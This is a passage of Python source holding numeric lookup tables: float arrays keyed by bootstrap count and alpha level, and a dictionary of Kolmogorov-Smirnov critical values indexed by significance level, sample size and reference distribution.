0.43852172851562543, 0.44346363067627004, 0.4484123992919927, 0.45336803436279355, 0.45833053588867245, 0.46329982757568416, 0.4682761383056646, 0.4732592391967779, 0.47824928283691465, 0.4832463455200201, 0.4882502746582037, 0.49326122283935603, 0.4982791900634771, 0.5033041000366216, 0.5083361816406258, 0.5133752822875985, 0.5184215545654305, 0.523474998474122, 0.5285356903076182, 0.5336035537719737, 0.5386787414550791, 0.5437613296508799, 0.5488512420654308, 0.5539486312866222, 0.5590534973144541, 0.5641659927368174, 0.5692860412597667, 0.5744137954711925, 0.5795494079589856, 0.584692726135255, 0.5898440551757824, 0.5950033950805675, 0.6001707458496106, 0.605346260070802, 0.6105300903320323, 0.6157223129272471, 0.6209229278564463, 0.6261321640014659, 0.6313500976562509, 0.6365768814086923, 0.6418125152587899, 0.6470573043823251, 0.6523112487792979, 0.657574577331544, 0.6628474426269542, 0.6681299209594738, 0.6734222412109387, 0.6787246322631848, 0.6840371704101575, 0.6893601608276381, 0.6946936798095718, 0.7000381088256851, 0.7053936004638688, 0.7107603836059586, 0.7161387634277359, 0.7215289688110367, 0.7269313049316422, 0.7323460769653336, 0.7377736663818375, 0.7432143020629898, 0.7486685180664077, 0.7541365432739273, 0.7596189117431658, 0.7651160049438495, 0.770628433227541, 0.7761565017700216, 0.7817009735107443, 0.7872623825073264, 0.7928412628173851, 0.7984385299682641, 0.8040547180175805, 0.8096908187866236, 0.8153476715087917, 0.8210262680053737, 0.8267276763916043, 0.8324530410766631, 0.8382038116455108, 0.843981285095218, 0.8497872161865265, 0.8556233596801788, 0.8614917755126983, 0.8673948287963897, 0.8733351135253937, 0.8793157577514681, 0.8853402709960971, 0.8914127731323276, 0.8975381469726595, 0.9037223434448278, 0.909972457885746, 0.9162973403930701, 0.922708053588871, 0.9292190170288124, 0.9358493804931678, 0.9426256179809609, 0.949586410522465, 0.9567917251586955, 0.9643453216552775, 0.9724580764770547, 0.981724624633793], 'num_bt = 100, alpha = 0.1': [0.0010530471801757815, 0.005330657958984376, 0.011070747375488285, 0.01755897521972656, 0.024520378112792965, 0.03181716918945312, 0.039369010925292956, 0.0471240997314453, 0.0550467300415039, 0.06311126708984374, 0.07129817962646484, 0.07959266662597655, 0.08798267364501955, 0.0964585876464844, 0.10501262664794928, 0.11363807678222662, 0.12232944488525396, 0.13108200073242193, 0.13989154815673835, 0.14875457763671884, 0.15766803741455088, 0.16662918090820322, 0.1756356430053712, 0.18468521118164077, 0.19377597808837904, 0.20290626525878921, 0.21207454681396504, 0.22127944946289085, 0.23051967620849634, 0.23979415893554712, 0.24910182952880888, 0.25844184875488313, 0.2678132247924808, 0.2772153472900394, 0.28664737701416043, 0.29610877990722684, 0.30559902191162136, 0.31511749267578154, 0.32466373443603547, 0.3342373657226566, 0.3438380813598637, 0.3534654235839848, 0.363119163513184, 0.37279899597168015, 0.3825047683715824, 0.39223625183105515, 0.4019932937622075, 0.4117758178710942, 0.4215836715698247, 0.4314168548583989, 0.4412752151489262, 0.45115890502929734, 0.4610678482055669, 0.47100219726562553, 0.48096195220947324, 0.4909472656250006, 0.5009583663940438, 0.5109952545166023, 0.5210583877563484, 0.5311478424072273, 0.5412639999389655, 0.5514071655273443, 0.5615777206420904, 0.5717761230468756, 0.5820027542114266, 0.5922581481933602, 0.6025429153442392, 0.612857666015626, 0.6232031631469737, 0.6335800170898447, 0.6439892196655284, 0.654431610107423, 0.6649082565307629, 0.6754202270507825, 0.6859688186645521, 0.6965554809570325, 0.7071815872192395, 0.7178489685058607, 0.7285595321655287, 0.739315338134767, 0.7501188278198256, 0.7609728240966811, 0.7718803024292007, 0.7828448486328139, 0.7938705825805679, 0.8049623107910171, 0.8161255264282241, 0.827366867065431, 0.8386942672729505, 0.8501174163818372, 0.8616481399536144, 0.8733016204833997, 0.8850971603393565, 0.8970608520507823, 0.9092285537719738, 0.9216524505615247, 0.9344142532348645, 0.9476547241210949, 0.9616604995727549, 0.9772372436523449], 'num_bt = 100, alpha = 0.05': [0.0005128097534179688, 0.0035651397705078114, 0.008225822448730467, 0.01377662658691406, 0.019905586242675778, 0.026449737548828123, 0.03331188201904297, 0.040428848266601564, 0.0477566146850586, 0.055263214111328125, 0.06292453765869141, 0.07072181701660157, 0.07864017486572264, 0.0866675567626953, 0.09479404449462892, 0.10301116943359379, 0.11131214141845708, 0.1196907806396485, 0.12814197540283206, 0.13666130065917975, 0.14524478912353522, 0.15388900756835944, 0.16259090423583994, 0.17134765625000012, 0.18015705108642593, 0.18901679992675796, 0.19792491912841811, 0.2068797302246095, 0.21587963104248062, 0.22492324829101581, 0.23400913238525406, 0.24313629150390642, 0.2523035049438478, 0.26150985717773456, 0.2707544326782229, 0.2800365447998049, 0.2893553543090823, 0.29871025085449254, 0.30810070037841836, 0.31752601623535204, 0.32698581695556694, 0.33647972106933655, 0.34600734710693426, 0.3555682373046881, 0.36516231536865296, 0.37478912353515687, 0.3844486618041999, 0.39414070129394607, 0.4038650131225594, 0.41362174987793054, 0.42341068267822346, 0.4332318878173837, 0.443085365295411, 0.4529711914062508, 0.46288959503173915, 0.4728406524658212, 0.48282451629638756, 0.4928414916992196, 0.5028918075561533, 0.5129758453369149, 0.5230939102172858, 0.5332465362548835, 0.5434341049194344, 0.5536571502685554, 0.5639163589477547, 0.5742122650146493, 0.5845457077026375, 0.5949174499511725, 0.605328330993653, 0.6157794189453132, 0.6262716293334969, 0.6368063354492195, 0.6473846817016609, 0.6580081939697273, 0.6686784744262704, 0.6793972015380867, 0.6901663589477547, 0.7009882354736336, 0.7118651199340829, 0.7227997589111337, 0.7337952804565437, 0.7448551177978522, 0.7559832382202156, 0.767184143066407, 0.778463096618653, 0.7898260498046881, 0.8012801742553717, 0.812833862304688, 0.8244971847534186, 0.836282348632813, 0.8482045364379889, 0.8602828979492192, 0.8725419998168951, 0.8850147247314459, 0.8977466201782232, 0.9108037567138676, 0.9242892074584965, 0.9383808135986333, 0.9534402084350593, 0.9704869842529305], 'num_bt = 100, alpha = 0.025': [0.00025318145751953127, 0.0024313354492187496, 0.00622997283935547, 0.011004486083984376, 0.016431846618652345, 0.022334899902343747, 0.02860530853271484, 0.03517158508300782, 0.04198360443115235, 0.04900466918945313, 0.056207008361816406, 0.06356887817382811, 0.07107303619384765, 0.07870536804199217, 0.0864543533325195, 0.09431030273437495, 0.10226490020751948, 0.11031120300292963, 0.11844318389892572, 0.12665557861328114, 0.13494373321533193, 0.14330360412597648, 0.15173160552978507, 0.1602246093749999, 0.16877971649169915, 0.1773944091796874, 0.18606639862060537, 0.19479362487792956, 0.20357418060302723, 0.21240638732910144, 0.22128879547119132, 0.23021987915039055, 0.23919857025146474, 0.24822349548339834, 0.25729381561279285, 0.26640838623046864, 0.2755665969848631, 0.2847674560546874, 0.2940104293823241, 0.3032947540283201, 0.31261997222900373, 0.32198554992675765, 0.33139102935791, 0.3408360290527342, 0.350320243835449, 0.35984336853027327, 0.369405174255371, 0.3790055084228515, 0.38864414215087884, 0.3983211517333983, 0.4080363082885741, 0.4177897644042967, 0.42758152008056627, 0.43741157531738273, 0.44728015899658197, 0.45718749999999997, 0.46713375091552733, 0.4771192169189453, 0.48714420318603513, 0.49720916748046873, 0.5073144912719727, 0.517460708618164, 0.5276483535766601, 0.5378781127929686, 0.5481506729125976, 0.5584667205810545, 0.5688272476196286, 0.5792331695556638, 0.589685478210449, 0.600185317993164, 0.6107340621948241, 0.6213330078124999, 0.631983757019043, 0.6426879119873048, 0.6534475326538087, 0.6642645263671876, 0.6751412582397462, 0.6860803222656253, 0.6970846176147463, 0.7081573486328125, 0.7193020248413087, 0.7305229187011719, 0.7418246078491211, 0.7532124328613279, 0.7646924972534177, 0.7762720489501949, 0.7879593276977535, 0.7997643280029292, 0.8116988754272456, 0.8237773895263665, 0.8360177230834953, 0.8484423828124994, 0.8610802841186516, 0.8739700317382804, 0.8871651077270499, 0.9007428741455068, 0.9148239517211905, 0.9296160888671865, 0.9455405807495105, 0.9637833404541005], 'num_bt = 50, alpha = 0.1': [0.002104988098144531, 0.010686798095703127, 0.022243995666503903, 0.03534767150878906, 0.04944561004638671, 0.06426040649414061, 0.07962970733642577, 0.09544906616210938, 0.11164653778076172, 0.12817016601562498, 0.14498111724853516, 0.1620494842529297, 0.1793517684936524, 0.19686920166015628, 0.21458644866943363, 0.23249114990234374, 0.25057315826416016, 0.2688238525390625, 0.28723644256591796, 0.30580520629882824, 0.32452541351318376, 0.34339347839355494, 0.36240657806396515, 0.38156257629394563, 0.4008601760864261, 0.42029869079589877, 0.439878196716309, 0.45959922790527385, 0.4794631576538091, 0.4994721984863286, 0.5196290206909184, 0.5399374389648441, 0.5604021072387699, 0.5810285949707035, 0.601823997497559, 0.6227967071533207, 0.6439570236206058, 0.6653173065185549, 0.6868929672241213, 0.7087026977539064, 0.7307703018188476, 0.7531256103515627, 0.7758077621459962, 0.7988690185546876, 0.8223818588256835, 0.8464518737792968, 0.8712435531616209, 0.897040786743164, 0.9244193649291994, 0.9549925994873047], 'num_bt = 50, alpha = 0.05': [0.0010253524780273436, 0.007153701782226562, 0.016551856994628904, 0.027787704467773428, 0.040236625671386715, 0.053571395874023424, 0.06759670257568356, 0.08218505859375, 0.09724811553955079, 0.11272163391113282, 0.1285573959350586, 0.14471817016601565, 0.1611745834350586, 0.1779032135009766, 0.19488491058349616, 0.2121041107177735, 0.22954799652099614, 0.24720588684082034, 0.2650691604614259, 0.28313056945800796, 0.3013843917846682, 0.3198258972167971, 0.33845157623291044, 0.3572587585449221, 0.376245918273926, 0.395412063598633, 0.4147572708129885, 0.4342823791503908, 0.45398914337158225, 0.4738802337646486, 0.4939592361450197, 0.5142308807373048, 0.5347008895874026, 0.5553767395019535, 0.5762670516967778, 0.5973825836181648, 0.6187364578247077, 0.6403443145751957, 0.6622255325317388, 0.6844039154052739, 0.7069094467163091, 0.7297798919677738, 0.7530647659301761, 0.7768299865722659, 0.8011670303344729, 0.826208877563477, 0.852162818908692, 0.8793858337402352, 0.9086018753051766, 0.9418449401855475], 'num_bt = 50, alpha = 0.025': [0.0005062484741210939, 0.004881439208984375, 0.012548561096191409, 0.022227935791015625, 0.03327510833740233, 0.045335311889648414, 0.058191719055175756, 0.07170074462890623, 0.08576206207275389, 0.10030220031738282, 0.11526584625244143, 0.1306098937988281, 0.1463006210327148, 0.1623106384277343, 0.17861782073974602, 0.1952041625976562, 0.21205471038818355, 0.22915710449218749, 0.24650104522705074, 0.26407836914062494, 0.28188220977783196, 0.29990722656249996, 0.31814914703369135, 0.3366050720214844, 0.3552730178833008, 0.37415191650390633, 0.3932419967651368, 0.4125440979003908, 0.4320604324340822, 0.4517940521240237, 0.47174915313720733, 0.4919313812255862, 0.5123475265502933, 0.5330061340332035, 0.5539176559448247, 0.5750946807861332, 0.5965523147583014, 0.6183092498779303, 0.6403881454467779, 0.6628169250488287, 0.685630607604981, 0.7088736724853519, 0.7326040267944338, 0.7568986511230471, 0.7818646621704104, 0.8076572418212895, 0.8345180892944339, 0.8628623962402346, 0.8935304641723636, 0.9288782501220707], 'num_bt = 30, alpha = 0.1': [0.003505865732828776, 0.0178689956665039, 0.03730777104695638, 0.05944360097249348, 0.08335453669230143, 0.10857747395833334, 0.13484245936075845, 0.16197719573974612, 0.18986501693725588, 0.21842352549235028, 0.24759359359741212, 0.2773321787516274, 0.3076083819071449, 0.33840077718098927, 0.3696960131327308, 0.40148760477701795, 0.4337754885355629, 0.4665662765502927, 0.4998735745747882, 0.5337188084920246, 0.5681330680847166, 0.6031595865885414, 0.6388580004374184, 0.6753109614054361, 0.7126363436381019, 0.7510082880655921, 0.7907005627950029, 0.8321870803833004, 0.8764300346374508, 0.926118723551432], 'num_bt = 30, alpha = 0.05': [0.0017083168029785158, 0.011975797017415368, 0.02781553268432617, 0.04685484568277994, 0.06805556615193684, 0.09087403615315756, 0.11498689651489258, 0.14018510182698568, 0.1663259824117025, 0.19330844879150394, 0.22105944951375328, 0.2495258967081706, 0.2786695798238119, 0.30846405029296875, 0.3388926506042481, 0.3699475606282553, 0.4016289710998535, 0.4339452743530273, 0.46691370010375977, 0.5005613327026367, 0.5349272727966307, 0.5700660705566404, 0.6060525576273598, 0.6429908752441403, 0.6810288429260251, 0.7203848520914709, 0.7614021619160968, 0.8046739578247067, 0.851403903961181, 0.9049661636352534], 'num_bt = 30, alpha = 0.025': [0.0008435885111490885, 0.008178138732910154, 0.021117115020751948, 0.03755346934000651, 0.056421693166097, 0.07713553110758462, 0.09933786392211913, 0.12279478708902995, 0.1473451932271322, 0.1728741963704427, 0.19929863611857096, 0.22655766805013022, 0.2546075503031413, 0.283418083190918, 0.3129702568054199, 0.3432552337646484, 0.3742734591166178, 0.4060349146525065, 0.4385598182678224, 0.4718799591064454, 0.5060409863789878, 0.5411063512166342, 0.5771634737650556, 0.6143334706624354, 0.6527883211771653, 0.6927816390991218, 0.7347115516662605, 0.7792645772298182, 0.827830537160238, 0.8842966715494796], 'num_bt = 20, alpha = 0.1': [0.005254220962524414, 0.026914119720458988, 0.05641789436340332, 0.0902134895324707, 0.12692608833312985, 0.16587238311767571, 0.20666403770446767, 0.24906482696533194, 0.29292883872985825, 0.33817090988159165, 0.3847514629364012, 0.4326707839965818, 0.4819692134857176, 0.5327330589294432, 0.5851095676422118, 0.6393381118774413, 0.6958132266998289, 0.7552347183227537, 0.8190390110015868, 0.8912508964538572], 'num_bt = 20, alpha = 0.05': [0.002561426162719727, 0.01806516647338867, 0.04216942787170409, 0.07135391235351564, 0.1040808200836182, 0.13955373764038093, 0.17731089591979982, 0.21706857681274416, 0.25865063667297367, 0.30195388793945327, 0.3469314098358156, 0.39358491897583026, 0.4419655323028567, 0.49218158721923855, 0.5444176197052006, 0.5989718437194829, 0.6563361644744876, 0.7173814773559575, 0.7838938236236577, 0.8608916282653813], 'num_bt = 20, alpha = 0.025': [0.0012650966644287111, 0.012348556518554692, 0.032070970535278326, 0.05733404159545899, 0.08657145500183107, 0.11893157958984377, 0.1539091587066651, 0.19119005203247075, 0.2305778980255127, 0.27195787429809565, 0.31527810096740716, 0.36054258346557605, 0.4078114986419677, 0.4572108268737792, 0.5089540958404539, 0.5633859634399412, 0.6210731983184814, 0.6830172538757324, 0.7512671947479248, 0.8315665245056152]} # noqa: E501, E231 crit_val_ini_ks = {0.001: {1000: {'uni': 0.06174732010933548, 'nor': 0.03896795290941646, 'beta1': 0.06139681196262953, 'beta2': 0.12199585736700946, 'beta4': 0.04582502097984753}, 750: {'uni': 0.07024635538683371, 'nor': 0.04459569470155689, 'beta1': 0.07021684632565739, 'beta2': 0.12815976069728274, 'beta4': 0.05264080908630758}, 500: {'uni': 0.08642770525355598, 'nor': 0.05509110394413119, 'beta1': 0.08761941562012493, 'beta2': 0.14913744793549832, 'beta4': 0.06421826877149445}, 400: {'uni': 0.09655798845997815, 'nor': 0.0613993273533881, 'beta1': 0.0964224097850293, 'beta2': 0.15858083637195353, 'beta4': 0.07290090814924588}, 300: {'uni': 0.11164843625013415, 'nor': 0.07106128126671396, 'beta1': 0.11009775320915205, 'beta2': 0.17523769295342007, 'beta4': 0.08305783948716328}, 200: {'uni': 0.13628359610263507, 'nor': 0.08740964922426725, 'beta1': 0.1376486743610651, 'beta2': 0.2010516066361282, 'beta4': 0.10286264686710184}, 150: {'uni': 0.15651662849813364, 'nor': 0.10038713469524929, 'beta1': 0.15819608234185656, 'beta2': 0.22229910725996993, 'beta4': 0.11634654326012955}, 100: {'uni': 0.19072306639877157, 'nor': 0.12280360833310089, 'beta1': 0.19321091289173042, 'beta2': 0.2581947494944321, 'beta4': 0.14328917055317145}, 75: {'uni': 0.21934961884964826, 'nor': 0.14015948249260646, 'beta1': 0.2219326490803759, 'beta2': 0.2846540951939676, 'beta4': 0.1652852320527448}, 50: {'uni': 0.2645907926740654, 'nor': 0.1710961682554944, 'beta1': 0.2678719773943101, 'beta2': 0.3289035352446858, 'beta4': 0.1999598991299047}, 30: {'uni': 0.3379078488296823, 'nor': 0.21594948610382936, 'beta1': 0.3441129978995892, 'beta2': 0.39361692414493443, 'beta4': 0.2508472086556259}, 20: {'uni': 0.3959074827161117, 'nor': 0.2608433948642659, 'beta1': 0.4133477648489873, 'beta2': 0.44853631830721913, 'beta4': 0.29952120108891395}, 10: {'uni': 0.5170765814161853, 'nor': 0.35733312354157704, 'beta1': 0.5398708466808257, 'beta2': 0.5422967523113658, 'beta4': 0.40686356644018595}}, 0.005: {1000: {'uni': 0.05458116632544635, 'nor': 0.03504577921766977, 'beta1': 0.054517449744692026, 'beta2': 0.10728185476765839, 'beta4': 0.040733497260050544}, 750: {'uni': 0.06253533672182854, 'nor': 0.04046369401135186, 'beta1': 0.06282543848266553, 'beta2': 0.11279561980513325, 'beta4': 0.04705273659300363}, 500: {'uni': 0.07714054796228054, 'nor': 0.0496468687606364, 'beta1': 0.07693955943931102, 'beta2': 0.1327433163224424, 'beta4': 0.05731924299024538}, 400: {'uni': 0.08617878042484084, 'nor': 0.05541748786526407, 'beta1': 0.08588821546881897, 'beta2': 0.13875443390078235, 'beta4': 0.06439825899654178}, 300: {'uni': 0.0986714495305242, 'nor': 0.06407724459065156, 'beta1': 0.09855314389102021, 'beta2': 0.1548737996243767, 'beta4': 0.07467900099977004}, 200: {'uni': 0.12062451647295991, 'nor': 0.07827596978503826, 'beta1': 0.12126943895923059, 'beta2': 0.17825544608232347, 'beta4': 0.09076754278924304}, 150: {'uni': 0.1396796839473482, 'nor': 0.09009210049264571, 'beta1': 0.14063288933757345, 'beta2': 0.1973907310236372, 'beta4': 0.10499002205047378}, 100: {'uni': 0.16922995185830964, 'nor': 0.10980683219099052, 'beta1': 0.17129406122009094, 'beta2': 0.22813210844235704, 'beta4': 0.12749534525918932}, 75: {'uni': 0.1953541681412001, 'nor': 0.12554665985678326, 'beta1': 0.19610381489611384, 'beta2': 0.25287194709425875, 'beta4': 0.1469739325714672}, 50: {'uni': 0.23503320028575814, 'nor': 0.15335710820924087, 'beta1': 0.23890161565850354, 'beta2': 0.2925965166545206, 'beta4': 0.17739407623100112}, 30: {'uni': 0.2976485313317806, 'nor': 0.19613498929034934, 'beta1': 0.3040864499477276, 'beta2': 0.35138347538048526, 'beta4': 0.22579108547722582}, 20: {'uni': 0.35388424243927113, 'nor': 0.23656926834477043, 'beta1': 0.36668171084515955, 'beta2': 0.39736542044382106, 'beta4': 0.2701286497170594}, 10: {'uni': 0.4630097657380493, 'nor': 0.3225433246916215, 'beta1': 0.47835376241010186, 'beta2': 0.4896209566095471, 'beta4': 0.36159750656596396}}, 0.01: {1000: {'uni': 0.05134454385349413, 'nor': 0.03330600875133105, 'beta1': 0.051275152087156495, 'beta2': 0.10009870323144221, 'beta4': 0.03865995666339189}, 750: {'uni': 0.05905726508494702, 'nor': 0.0383879788508078, 'beta1': 0.059272477516056354, 'beta2': 0.10502806705945988, 'beta4': 0.04450291981279328}, 500: {'uni': 0.07249296242654668, 'nor': 0.046932424204244594, 'beta1': 0.07240630431885364, 'beta2': 0.12408220110978818, 'beta4': 0.05424039706492939}, 400: {'uni': 0.080902691313323, 'nor': 0.05248129300353904, 'beta1': 0.08043677899242607, 'beta2': 0.12974923298059704, 'beta4': 0.06073621209890695}, 300: {'uni': 0.09306590895115929, 'nor': 0.06042909220901882, 'beta1': 0.0929294897119688, 'beta2': 0.14441139871845998, 'beta4': 0.07029934609881988}, 200: {'uni': 0.11331581936959173, 'nor': 0.07407780477974035, 'beta1': 0.11400852794991234, 'beta2': 0.16697088723911058, 'beta4': 0.08578814408291241}, 150: {'uni': 0.13110747055603822, 'nor': 0.08511174074211825, 'beta1': 0.13197498872552438, 'beta2': 0.18525721022812291, 'beta4': 0.09923887427643563}, 100: {'uni': 0.15947898396010982, 'nor': 0.10396630211898589, 'beta1': 0.16076780252138057, 'beta2': 0.21274473456821097, 'beta4': 0.1203847339328595}, 75: {'uni': 0.18341423985159883, 'nor': 0.11924687585622445, 'beta1': 0.1847923465861807, 'beta2': 0.23689175806686585, 'beta4': 0.13862384194648647}, 50: {'uni': 0.22065058332465762, 'nor': 0.14525710370631756, 'beta1': 0.2245287846345721, 'beta2': 0.27453195725371937, 'beta4': 0.16751626430377106}, 30: {'uni': 0.2806366070013675, 'nor': 0.18585975643934483, 'beta1': 0.28507040255377625, 'beta2': 0.32929770986141144, 'beta4': 0.2134224231720387}, 20: {'uni': 0.3334575751692692, 'nor': 0.22511252321148278, 'beta1': 0.3441640350433964, 'beta2': 0.3740749374193295, 'beta4': 0.2544162136548306}, 10: {'uni': 0.4366755558485817, 'nor': 0.3071991308976279, 'beta1': 0.4527891584489994, 'beta2': 0.46379050302844543, 'beta4': 0.34067023770504523}}, 0.05: {1000: {'uni': 0.04280142303978185, 'nor': 0.02860827073335037, 'beta1': 0.04282682578644642, 'beta2': 0.07986970874762322, 'beta4': 0.03275686429767982}, 750: {'uni': 0.049427811587210435, 'nor': 0.03298169164204601, 'beta1': 0.049275909605582924, 'beta2': 0.08486927467601035, 'beta4': 0.03775404114622272}, 500: {'uni': 0.06038458458366747, 'nor': 0.04027106205628239, 'beta1': 0.060195942616294934, 'beta2': 0.09995114375214009, 'beta4': 0.04613912209290452}, 400: {'uni': 0.0671626804698282, 'nor': 0.044967180104620696, 'beta1': 0.06747611786364349, 'beta2': 0.10571668604744544, 'beta4': 0.05152182574562672}, 300: {'uni': 0.07742312239112692, 'nor': 0.051666837623702166, 'beta1': 0.07767087703759445, 'beta2': 0.1178767433776362, 'beta4': 0.059452507414415046}, 200: {'uni': 0.09469966587530276, 'nor': 0.06343358521113673, 'beta1': 0.0950578895294647, 'beta2': 0.1366784736556006, 'beta4': 0.07255703928500457}, 150: {'uni': 0.10900935208153273, 'nor': 0.07289171579483816, 'beta1': 0.11002479909769114, 'beta2': 0.15242729269865973, 'beta4': 0.08373240678443566}, 100: {'uni': 0.13281274766076206, 'nor': 0.08920713936479638, 'beta1': 0.13377803165947766, 'beta2': 0.17499650468558625, 'beta4': 0.10190606958299475}, 75: {'uni': 0.15239779918045748, 'nor': 0.10243980804370362, 'beta1': 0.1541106817008704, 'beta2': 0.19485071272087295, 'beta4': 0.11705102736538112}, 50: {'uni': 0.18438141684534104, 'nor': 0.12466885274854955, 'beta1': 0.18728113451838269, 'beta2': 0.22658281610394648, 'beta4': 0.14239913459102727}, 30: {'uni': 0.23331654346299174, 'nor': 0.15906588455123438, 'beta1': 0.2387860500631408, 'beta2': 0.2718245732806131, 'beta4': 0.18048185108580744}, 20: {'uni': 0.2786314950878662, 'nor': 0.19349526617388257, 'beta1': 0.28589622085949756, 'beta2': 0.31147388293415956, 'beta4': 0.2164769385370286}, 10: {'uni': 0.3661289030334679, 'nor': 0.2658953985567251, 'beta1': 0.379401813819888, 'beta2': 0.38802519102270194, 'beta4': 0.2910744690699496}}, 0.1: {1000: {'uni': 0.038515938269794825, 'nor': 0.026313661922827247, 'beta1': 0.03860111298969593, 'beta2': 0.0695550650755411, 'beta4': 0.029845093507530562}, 750: {'uni': 0.04446055609985289, 'nor': 0.030266189959470058, 'beta1': 0.044472158939188655, 'beta2': 0.07438972690212953, 'beta4': 0.03440796201601326}, 500: {'uni': 0.054329235300242695, 'nor': 0.03705807984250126, 'beta1': 0.054235810729029665, 'beta2': 0.08755778874782771, 'beta4': 0.04215154900032181}, 400: {'uni': 0.06062042253055755, 'nor': 0.04134489759753035, 'beta1': 0.06087419042912867, 'beta2': 0.09290608277922241, 'beta4': 0.04695774138644898}, 300: {'uni': 0.06979122578785563, 'nor': 0.04752352646874458, 'beta1': 0.06987407314079985, 'beta2': 0.1036455137376669, 'beta4': 0.05408391441556548}, 200: {'uni': 0.08525612760509743, 'nor': 0.05822021391999288, 'beta1': 0.08573405996535222, 'beta2': 0.12083720989995606, 'beta4': 0.06606270634268102}, 150: {'uni': 0.09822498098395582, 'nor': 0.0670687425730856, 'beta1': 0.09891726246491339, 'beta2': 0.134942222786968, 'beta4': 0.07625187550090379}, 100: {'uni': 0.11942187198187654, 'nor': 0.08196700841704041, 'beta1': 0.12048182599113988, 'beta2': 0.15542188429324677, 'beta4': 0.0927888394179889}, 75: {'uni': 0.13700377353508753, 'nor': 0.09413798516069916, 'beta1': 0.13863023455324552, 'beta2': 0.1728224431499087, 'beta4': 0.10651114960711697}, 50: {'uni': 0.16595760075302907, 'nor': 0.11446069154286698, 'beta1': 0.1684755311187931, 'beta2': 0.20208064524892055, 'beta4': 0.12935863603313313}, 30: {'uni': 0.2099293273700812, 'nor': 0.1463282048690624, 'beta1': 0.21473921841431154, 'beta2': 0.24269192295102882, 'beta4': 0.1646851441089735}, 20: {'uni': 0.25056763248182895, 'nor': 0.17786313124907188, 'beta1': 0.2575087202242632, 'beta2': 0.27927953593860777, 'beta4': 0.19740515280724447}, 10: {'uni': 0.3304962789807138, 'nor': 0.2447591671591835, 'beta1': 0.3420336141758848, 'beta2': 0.34940564498843646, 'beta4': 0.26587190498978686}}, 0.2: {1000: {'uni': 0.033759081350374254, 'nor': 0.02372992290154119, 'beta1': 0.03379104644423217, 'beta2': 0.05775603239505678, 'beta4': 0.026618493861847614}, 750: {'uni': 0.03897357249045624, 'nor': 0.027281398645080723, 'beta1': 0.038972994365299635, 'beta2': 0.0621653283130667, 'beta4': 0.030665891126849754}, 500: {'uni': 0.04758909935471711, 'nor': 0.03337684532828111, 'beta1': 0.047570804678383094, 'beta2': 0.07333077050088904, 'beta4': 0.037565566599256583}, 400: {'uni': 0.053119550234104085, 'nor': 0.03725028390570345, 'beta1': 0.053295404906414934, 'beta2': 0.0782294183344644, 'beta4': 0.04183281867666566}, 300: {'uni': 0.061196404682106964, 'nor': 0.04292324729747321, 'beta1': 0.06136906566660827, 'beta2': 0.08744970320312462, 'beta4': 0.04824159064240345}, 200: {'uni': 0.0746784511345509, 'nor': 0.0524733341649114, 'beta1': 0.07510973684586475, 'beta2': 0.10260712327402122, 'beta4': 0.058942065335903404}, 150: {'uni': 0.08595093737016697, 'nor': 0.060424202583133746, 'beta1': 0.08641030234814334, 'beta2': 0.1148837044228368, 'beta4': 0.0679067944916304}, 100: {'uni': 0.10443555935757931, 'nor': 0.07374329417580833, 'beta1': 0.10551157755974006, 'beta2': 0.13294004606451998, 'beta4': 0.08265330043672003}, 75: {'uni': 0.11993235153506276, 'nor': 0.08480408445268339, 'beta1': 0.12138149971982604, 'beta2': 0.14821067875308103, 'beta4': 0.09487982606384139}, 50: {'uni': 0.1450901598179003, 'nor': 0.10314539464936745, 'beta1': 0.14745197306443125, 'beta2': 0.17411692213927954, 'beta4': 0.11517539906859259}, 30: {'uni': 0.18368281401813502, 'nor': 0.1321090658183411, 'beta1': 0.1875463935108379, 'beta2': 0.21006490447672693, 'beta4': 0.14663588943386274}, 20: {'uni': 0.2196807646682773, 'nor': 0.15994694395320508, 'beta1': 0.22522106948161613, 'beta2': 0.24235899456781695, 'beta4': 0.17573119318593766}, 10: {'uni': 0.2888943190995493, 'nor': 0.220722689927199, 'beta1': 0.2985481150360235, 'beta2': 0.3045137581383749, 'beta4': 0.236985210651535}}, 0.25: {1000: {'uni': 0.032062416809360894, 'nor': 0.0227866671462571, 'beta1': 0.03208834216728629, 'beta2': 0.05337049741834132, 'beta4': 0.025475357813055488}, 750: {'uni': 0.03701423511603763, 'nor': 0.026225229844276166, 'beta1': 0.03703256957864909, 'beta2': 0.057813715669675636, 'beta4': 0.02936248102422831}, 500: {'uni': 0.045227717679089396, 'nor': 0.0320485047106529, 'beta1': 0.04519714698473515, 'beta2': 0.06831356769816821, 'beta4': 0.03593644546272762}, 400: {'uni': 0.050450659079979754, 'nor': 0.03581784094010593, 'beta1': 0.05056637414823473, 'beta2': 0.0729182038087659, 'beta4': 0.04001889562676658}, 300: {'uni': 0.058161445018157565, 'nor': 0.041252983698886025, 'beta1': 0.058325688269647125, 'beta2': 0.08170482185096284, 'beta4': 0.04612705504436812}, 200: {'uni': 0.07094962986364317, 'nor': 0.05046048885276999, 'beta1': 0.0712213019748647, 'beta2': 0.09581725770034533, 'beta4': 0.0563670463913345}, 150: {'uni': 0.0815744257595088, 'nor': 0.058060489761412676, 'beta1': 0.08204932927986253, 'beta2': 0.1075479659950831, 'beta4': 0.06500871809976655}, 100: {'uni': 0.09912785547497138, 'nor': 0.0707907611619234, 'beta1': 0.10021469580117251, 'beta2': 0.12475954060183503, 'beta4': 0.0790298213954928}, 75: {'uni': 0.11388087855996165, 'nor': 0.08144708523365077, 'beta1': 0.1151935997969889, 'beta2': 0.13944968782072553, 'beta4': 0.09073471227314939}, 50: {'uni': 0.13765260055314554, 'nor': 0.0991006689972383, 'beta1': 0.13998309637363815, 'beta2': 0.16393144318454161, 'beta4': 0.11023561371839477}, 30: {'uni': 0.1741856459150477, 'nor': 0.1269186751139828, 'beta1': 0.1778768200120303, 'beta2': 0.19832202672268084, 'beta4': 0.14017916545551046}, 20: {'uni': 0.20839509742333207, 'nor': 0.1535088033354377, 'beta1': 0.21387705197529588, 'beta2': 0.22870691603776427, 'beta4': 0.16824942099586182}, 10: {'uni': 0.2740727774470333, 'nor': 0.21222634033868049, 'beta1': 0.2828793884551896, 'beta2': 0.288383430493807, 'beta4': 0.22670497011739216}}, 0.3: {1000: {'uni': 0.03057612825774314, 'nor': 0.02199386622109878, 'beta1': 0.03061262686465055, 'beta2': 0.049703953698298386, 'beta4': 0.02447722233427918}, 750: {'uni': 0.03533838333580652, 'nor': 0.02530417208682001, 'beta1': 0.03537355380273649, 'beta2': 0.05399871759330599, 'beta4': 0.02823270309239162}, 500: {'uni': 0.043123689527982734, 'nor': 0.030927801548839978, 'beta1': 0.043123330457107534, 'beta2': 0.06396221956203696, 'beta4': 0.034528974097892545}, 400: {'uni': 0.04814799667805744, 'nor': 0.03456908247933843, 